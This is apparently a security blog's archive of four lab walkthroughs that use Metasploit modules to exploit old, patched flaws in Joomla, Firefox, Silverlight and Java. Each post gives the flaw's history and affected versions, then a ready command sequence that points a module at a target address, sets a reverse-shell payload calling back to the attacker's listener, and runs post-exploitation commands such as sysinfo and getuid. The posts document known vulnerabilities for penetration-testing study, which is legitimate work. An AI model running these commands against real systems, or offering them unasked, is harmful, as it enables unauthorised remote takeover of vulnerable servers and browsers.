Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2015-8562 Joomla HTTP Header Unauthenticated RCE

Timeline :

Vulnerability discovered exploited in the wild
Patched by the vendor the 2015-12-14
Metasploit PoC provided the 2015-12-16

PoC provided by :

Marc-Alexandre Montpas
Christian Mehlmauer

Reference(s) :

CVE-2015-8562
20151201

Affected version(s) :

All versions of Joomla versions between 1.5.0 to 3.4.5 included.
In order to exploit this vulnerability PHP must also be vulnerable to the deserialisation vulnerability.

Tested on :

Joomla 3.4.5 on Linux ubuntu-1210 with PHP 5.4.6-1ubuntu1

Description :

Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it’s possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read from the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.

Commands :

use exploit/multi/http/joomla_http_header_rce
set RHOST 192.168.6.143
set PAYLOAD php/meterpreter/reverse_tcp 
set LHOST 192.168.6.138
exploit

sysinfo

CVE-2013-1710 Firefox toString console.time Privileged Javascript Injection

Timeline :

Vulnerability discovered by moz_bug_r_a4
Vulnerability reported to the vendor by moz_bug_r_a4 the 2013-05-12
Patched by the vendor the 2013-08-06
Metasploit PoC provided the 2014-08-15

PoC provided by :

moz_bug_r_a4
Cody Crews
joev

Reference(s) :

CVE-2013-1710
MFSA-2013-69

Affected version(s) :

All versions of Mozilla Firefox versions between 15 and 22 included.

Tested on :

Windows 7 SP1 with Mozilla Firefox 22.0

Description :

This exploit gains remote code execution on Firefox 15-22 by abusing two separate Javascript-related vulnerabilities to ultimately inject malicious Javascript code into a context running with chrome://privileges.

Commands :

use exploit/multi/browser/firefox_tostring_console_injection
set SRVHOST 192.168.6.138
set PAYLOAD firefox/shell_reverse_tcp 
set LHOST 192.168.6.138
exploit

SYSTEMINFO

MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access

Timeline :

Vulnerability discovered by James Forshaw
Patched by the vendor the 2013-03-12
PoC provided by Vitaliy Toropov the 2013-10-23
Discovered exploited into Exploit Kits the 2013-11-13
Metasploit PoC provided the 2013-11-22

PoC provided by :

James Forshaw
Vitaliy Toropov
juan vazquez

Reference(s) :

CVE-2013-0074
CVE-2013-3896
OSVDB-91147
OSVDB-98223
BID-58327
BID-62793
MS13-022
MS13-087

Affected version(s) :

All versions of Microsoft Silverlight 5 bellow version 5.1.20125.0

Tested on :

Windows 7 SP1 with Microsoft Silverlight version 5.1.20125.0

Description :

This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an unsafe manner. Since it is accessible for untrusted code (user controlled) it’s possible to dereference arbitrary memory which easily leverages to arbitrary code execution. In order to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class from System.Windows.dll. This module has been tested successfully on IE6 – IE10, Windows XP SP3 / Windows 7 SP1.

Commands :

use exploit/windows/browser/ms13_022_silverlight_script_object
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

sysinfo
getuid

CVE-2013-1493 Java CMM Remote Code Execution

Timeline :

Discovered exploited in the wild in 2013-02
Metasploit PoC provided the 2013-03-26
Patched by the vendor the 2013-04-16

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2013-1493
OSVDB-90737
BID-58238
Oracle Security Alert for CVE-2013-1493

Affected version(s) :

Oracle Java SE 7 Update 15 and before
Oracle Java SE 6 Update 41 and before

Tested on :

Windows 7 SP1 with Java SE 7 Update 15

Description :

This module abuses the Color Management classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41 and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1 systems. This exploit doesn’t bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.

Commands :

use exploit/windows/browser/java_cmm
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
set LHOST 192.168.0.20
exploit

sysinfo
getuid